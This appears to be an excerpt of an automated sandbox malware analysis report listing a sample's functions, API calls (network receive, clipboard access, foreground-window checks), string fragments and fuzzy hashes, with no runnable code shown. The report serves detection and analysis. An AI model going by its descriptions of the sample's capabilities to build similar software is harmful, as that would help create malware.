                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                              Function 0043A8A0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C140), ref: 0043A8B0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: d6dbcbf8b542cde73418b76500dbd9dd0f4a50229da9f062c79f95f44985c153
                                                                                                                                                                                                                                                              • Instruction ID: ea03f301df6f300e14cd71b3130521d977c2af5e1fcee41cb7ea342c3d599e91
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6dbcbf8b542cde73418b76500dbd9dd0f4a50229da9f062c79f95f44985c153
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11C0123884A250ABC204AF00DC04B66BA78AF0B251F206429A40A335B2C720E841CA9C
                                                                                                                                                                                                                                                              Function 0041CB61 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • select.WS2_32(?,JrA,00000000,00000000,00000000), ref: 0041CC32
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: select
                                                                                                                                                                                                                                                              • String ID: JrA
                                                                                                                                                                                                                                                              • API String ID: 1274211008-1249927954
                                                                                                                                                                                                                                                              • Opcode ID: 6801159b7d8da42910f3063398eeb789ff550d91b00b474ef2de267fcfba9c4f
                                                                                                                                                                                                                                                              • Instruction ID: b64305b6fd8586e25285435711547b6261ab3bf043a02e7b94ee1d8b836499bb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6801159b7d8da42910f3063398eeb789ff550d91b00b474ef2de267fcfba9c4f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF21753154C3409BC704CF39EC813ABBBE2AFC6314F18896EE0D1D33A1C2B898428B41
                                                                                                                                                                                                                                                              Function 00436DB9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 00436DE8
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                                              • String ID: rX]^
                                                                                                                                                                                                                                                              • API String ID: 95929093-18585577
                                                                                                                                                                                                                                                              • Opcode ID: c5782d1f1b1acb3603ed6c7abcf7a388ae5646f6ee8c3db6b7038f89b1178cb5
                                                                                                                                                                                                                                                              • Instruction ID: ef175c13b8ced7d32decf1b74c942c3bf522003778d9426a1b8e920db7a7830d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5782d1f1b1acb3603ed6c7abcf7a388ae5646f6ee8c3db6b7038f89b1178cb5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE212F75E042A58FDB108A78CC813DDBBE09F59314F1981BDC994A7380D77D8D444B91
                                                                                                                                                                                                                                                              Function 0043C2AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043C30C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                                              • String ID: uhij
                                                                                                                                                                                                                                                              • API String ID: 2020703349-574180738
                                                                                                                                                                                                                                                              • Opcode ID: fe5da282865f109871a6ecb703cd99fa4c6c270345d4574396334971c51367c3
                                                                                                                                                                                                                                                              • Instruction ID: 98d05f4d7b2230f5c666ae21a8e90cbed6482788d95c15171a925ee28005b505
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe5da282865f109871a6ecb703cd99fa4c6c270345d4574396334971c51367c3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40012D7E70A1405BDB0C9B34ED4725B7BB39386309F08953DD442C3791ED3ED8068649
                                                                                                                                                                                                                                                              Function 0040EBA3 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EBB5
                                                                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EBCD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                                                                              • Opcode ID: 042b8f7b77cc745151dd42a6a5e6c6ba1ef6fa1493a5705103e72e0ec01d0f40
                                                                                                                                                                                                                                                              • Instruction ID: 68dab68a2611eaf1f98fe2e0d682a4e8587265123918b47ae6ee898c9d74bc25
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 042b8f7b77cc745151dd42a6a5e6c6ba1ef6fa1493a5705103e72e0ec01d0f40
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1F0B67ABC8320BBF67897149C17F9421149B86F62F354325BB293E7E4C6D43900858D
                                                                                                                                                                                                                                                              Function 0041FF20 Relevance: 1.7, APIs: 1, Instructions: 219networkCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000008,?,?,?,?,?,?,00000000,00000001,0041F9AA,?), ref: 0041FF62
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                                                              • Opcode ID: 2e9f9e79b27b2719579ea4b4089d07e52da9a0ddef7d38fab6be1d599b5d7d94
                                                                                                                                                                                                                                                              • Instruction ID: e619a0b3b210486374576d39e77f4beaa3928a4ef597319f5c70b5afe925a67a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e9f9e79b27b2719579ea4b4089d07e52da9a0ddef7d38fab6be1d599b5d7d94
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A612A35A0C3619FC325CF29D84052EBBE1AF95314F18C2BEE8A44B393D63A9D06C795
                                                                                                                                                                                                                                                              Function 0043C0E0 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043C12C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: a7b5ce398147ff0c5e36b48ddd3168103327388c6c3469147a873e66165bc8da
                                                                                                                                                                                                                                                              • Instruction ID: a8ed7c45330a1918d513a40f86c340956036e817f217c793e8e1f9daf95a6055
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7b5ce398147ff0c5e36b48ddd3168103327388c6c3469147a873e66165bc8da
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66F09035418250EBD6142F25BC05B1B3A34FF8B721F0118B5F005661B2C738E813DAAE
                                                                                                                                                                                                                                                              Function 0041CDD2 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • shutdown.WS2_32(?,00000002), ref: 0041CE26
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: shutdown
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2510479042-0
                                                                                                                                                                                                                                                              • Opcode ID: d4038cbffc7969280b57e1a7f2e61d4ecbe2e17efbc5679d7a551f5bc81727cf
                                                                                                                                                                                                                                                              • Instruction ID: b0a532a1610060099f1dd055896910480b409afff79fa9d868897ca09bfd6f6d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4038cbffc7969280b57e1a7f2e61d4ecbe2e17efbc5679d7a551f5bc81727cf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA012634548301BBC620DF14EC82F5B37E1AF85328F008A2CB5ACA62F0D375A9518B0A
                                                                                                                                                                                                                                                              Function 00431640 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                                              • Opcode ID: c56bfe133a7e9b334f43a47dfc655985188feebc2614a32482a57a4b23c8fb11
                                                                                                                                                                                                                                                              • Instruction ID: 189fe8157a22b933eaa9243c6b61fe273c95344eb111398440ebc431827aed26
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c56bfe133a7e9b334f43a47dfc655985188feebc2614a32482a57a4b23c8fb11
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F074B450D342CFE714DF29C5A871ABBE1BBC5344F01891CE4998B790D7B59549CF82
                                                                                                                                                                                                                                                              Function 00430FA3 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                                              • Opcode ID: 6120e3ea8a807733523cfe404b9402478c9ffdd6f76c91c5e4214e89bdad5abe
                                                                                                                                                                                                                                                              • Instruction ID: 13b3eb9ee25cd7d89a9acbb5bbae49bfea62dd5ba0374e4de00fe8b64a3f7716
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6120e3ea8a807733523cfe404b9402478c9ffdd6f76c91c5e4214e89bdad5abe
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82F0FEB45093018FD304DF28C5A875BBBE0FF89344F11881CE0998B390C7B5AA48CF82
                                                                                                                                                                                                                                                              Function 0040C5E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5F3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                                              • Opcode ID: 7affa8ddd7996fb7e9b69a36d60abaed47600370150e60f81ecdfc71045c4293
                                                                                                                                                                                                                                                              • Instruction ID: fa5ab94b9a6549c588a503765076fe980f8647f728cae694d10bd74d2d58c513
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7affa8ddd7996fb7e9b69a36d60abaed47600370150e60f81ecdfc71045c4293
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAE07D78AA00005BD30C5F28CC06F513325C787722F04823DB112832E6EC307908C314
                                                                                                                                                                                                                                                              Function 0043A8D0 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,?,00000000,0040B2E1,00000000,00000001,?,00000000), ref: 0043A905
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                                              • Opcode ID: 69b30920e6c9834005f2320e373951eeef9118cf4aabf2b3416a293ff8ad59a4
                                                                                                                                                                                                                                                              • Instruction ID: 8801ed89c68f70514b9edba5ed3968f9f60f5bda428713c8fd83ccc7b5780fd7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69b30920e6c9834005f2320e373951eeef9118cf4aabf2b3416a293ff8ad59a4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5E08C3040A221EBC2202F11FD06B8A3A24EF06722F0240B0F100AA4F1C770DC92DB8C
                                                                                                                                                                                                                                                              Function 0043C2FE Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043C30C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                                                                              • Opcode ID: 28895f92958f0a94c77eede1aa7c39d81608709bbbce7b93a7923cd2d34917f3
                                                                                                                                                                                                                                                              • Instruction ID: ca16adac3c72a2624057cc77a34347ccbcbd393879fb5e3d0e34a1d64ed82d61
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28895f92958f0a94c77eede1aa7c39d81608709bbbce7b93a7923cd2d34917f3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3E086BDB061405FC704CB10EC036513367A38A2063188076D901C77A6DB39E805CA45

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 00432BE0 Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 96clipboardCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                              • String ID: +$?$O$Q$W$`$b$c$n$q$r$|
                                                                                                                                                                                                                                                              • API String ID: 2832541153-2449071873
                                                                                                                                                                                                                                                              • Opcode ID: 70f3e16eb7e6523f201d396fa45a88fc54849c34cd480ac3fad2cb9dedd82d4e
                                                                                                                                                                                                                                                              • Instruction ID: 92a310d55d5ea67847d73ba210176b314c5cefcfe13a23c4d34ff5e5e30a8fa4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70f3e16eb7e6523f201d396fa45a88fc54849c34cd480ac3fad2cb9dedd82d4e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77414CB050C3818EE341AF78D58935FBFE0AB96308F04586DE8C987292D6B9958CC767
                                                                                                                                                                                                                                                              Function 0042EB16 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 312COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                                              • String ID: ,940$-$?$49$8:6?
                                                                                                                                                                                                                                                              • API String ID: 3664257935-1315884853
                                                                                                                                                                                                                                                              • Opcode ID: 2713966c13a9916ab6070811b3172db1ae3e0a8211df943558d8602d3a422018
                                                                                                                                                                                                                                                              • Instruction ID: 0e4f8ad514ff57aa5eb40feaeb3584a6191d670d19b9241763b9c925407e0e47
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2713966c13a9916ab6070811b3172db1ae3e0a8211df943558d8602d3a422018
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1891A1326083918FE3218F29CC517ABBBD1DFD6314F19896DE4C99B382D6389906C796
                                                                                                                                                                                                                                                              Function 00431C7E Relevance: 64.9, APIs: 1, Strings: 36, Instructions: 161memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                                                                              • String ID: $!$$$%$&$)$)$-$-$0$2$4$6$>$A$C$E$G$I$K$M$O$Q$S$U$W$Y$Yz{@#^Q$[$]$_$g$i$k$m$o
                                                                                                                                                                                                                                                              • API String ID: 2525500382-522938286
                                                                                                                                                                                                                                                              • Opcode ID: ff019ebd26435f359dcf28e44e712dc7165cf618e877b448631396c271aaac4d
                                                                                                                                                                                                                                                              • Instruction ID: 2f1c3c64c2a491f88769adbc13a15e256d52b4c8b6030e9a322d14bce727f2cc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff019ebd26435f359dcf28e44e712dc7165cf618e877b448631396c271aaac4d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8491D32150C7C18DE332C73C881879BBED11BA7224F084B9ED5E99B2E2D7BA4549C767
                                                                                                                                                                                                                                                              Function 0043230D Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 95COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                              • String ID: %$'$)$+$-$/$1$3$5$7$9$:$;$|
                                                                                                                                                                                                                                                              • API String ID: 2610073882-2490240685
                                                                                                                                                                                                                                                              • Opcode ID: ce07dd7f79ead5cc65edd6cbb2a9c7635b8f66265ebf8010a9726540ef825b6c
                                                                                                                                                                                                                                                              • Instruction ID: 2a2879e89a61be8d421707297cc0c2aa7788c55eaf340b1b63f7dd626f884428
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce07dd7f79ead5cc65edd6cbb2a9c7635b8f66265ebf8010a9726540ef825b6c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6341493150C7C18ED3219B38888824BBFD1ABEA328F485B5DE0E5473D6C6B4854ACB57